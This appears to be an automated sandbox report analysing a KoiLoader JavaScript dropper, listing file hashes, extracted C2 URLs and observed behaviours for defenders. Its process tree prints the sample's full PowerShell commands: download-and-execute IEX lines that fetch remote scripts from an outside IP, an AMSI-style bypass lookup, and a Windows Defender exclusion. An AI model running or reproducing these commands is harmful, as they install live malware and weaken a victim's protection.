Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2025, 13:36
Static task
static1
Behavioral task
behavioral1
Sample
r6eac11b8-35d6-bffe-da50-d9e1a5ae832ar.js
Resource
win7-20240903-en
General
-
Target
r6eac11b8-35d6-bffe-da50-d9e1a5ae832ar.js
-
Size
1KB
-
MD5
efcc96851f4724909616b5f3ec81cf79
-
SHA1
783d14e21e058733ef6cc6ca1e934bcf2533d134
-
SHA256
a6bda80c9f914fb5b640d3437c264993b49a91d997562d53f5ba8d32ac979ec1
-
SHA512
c4f152a2caad73ed9a50df2394b59749b6aed00b3135289881c730b9d9d7ec6d34f0fd51e8785ee32da0e2e1b5da3c6b896743b13941d4496c930138e6065e44
Malware Config
Extracted
http://79.124.78.109/wp-includes/phyllopodan7V7GD.php
http://79.124.78.109/wp-includes/barasinghaby.ps1
Extracted
koiloader
http://79.124.78.109/flocking.php
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/4044-25-0x00000000072A0000-0x00000000072AD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 5 IoCs
flow pid Process 15 4044 powershell.exe 19 4044 powershell.exe 21 1524 powershell.exe 42 4044 powershell.exe 48 4044 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2960 powershell.exe 1524 powershell.exe 4044 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4044 powershell.exe 4044 powershell.exe 2960 powershell.exe 2960 powershell.exe 1524 powershell.exe 1524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 4832 wrote to memory of 4044 4832 wscript.exe 83 PID 4832 wrote to memory of 4044 4832 wscript.exe 83 PID 4832 wrote to memory of 4044 4832 wscript.exe 83 PID 4956 wrote to memory of 4984 4956 DllHost.exe 86 PID 4956 wrote to memory of 4984 4956 DllHost.exe 86 PID 4956 wrote to memory of 4984 4956 DllHost.exe 86 PID 4984 wrote to memory of 2960 4984 cmd.exe 88 PID 4984 wrote to memory of 2960 4984 cmd.exe 88 PID 4984 wrote to memory of 2960 4984 cmd.exe 88 PID 4044 wrote to memory of 856 4044 powershell.exe 91 PID 4044 wrote to memory of 856 4044 powershell.exe 91 PID 4044 wrote to memory of 856 4044 powershell.exe 91 PID 856 wrote to memory of 1524 856 cmd.exe 93 PID 856 wrote to memory of 1524 856 cmd.exe 93 PID 856 wrote to memory of 1524 856 cmd.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\r6eac11b8-35d6-bffe-da50-d9e1a5ae832ar.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zTJRTNUX3VD'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\rcca0d105-8260-4611-8c12-bd85a7208b9fr.js"1⤵PID:5108
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\rcca0d105-8260-4611-8c12-bd85a7208b9fr.js"1⤵PID:4212
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5efcc96851f4724909616b5f3ec81cf79
SHA1783d14e21e058733ef6cc6ca1e934bcf2533d134
SHA256a6bda80c9f914fb5b640d3437c264993b49a91d997562d53f5ba8d32ac979ec1
SHA512c4f152a2caad73ed9a50df2394b59749b6aed00b3135289881c730b9d9d7ec6d34f0fd51e8785ee32da0e2e1b5da3c6b896743b13941d4496c930138e6065e44
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
19KB
MD5eeeba0a4193de537178d40afa3b52152
SHA151605caef26356245d06237ba9c9d2e5f9572f68
SHA256996134a37cb1a5b65d55dba6952700ef705236b6df287ee93b7df9b08fac5829
SHA512fc9ba58559755c663d6d40f2be1ffe0c47c3810d192b6339a9b5c0452ac48462e141138831c56f7811adc85dcdf8656c3a24038c6c8564bf3eb5275af214b289
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82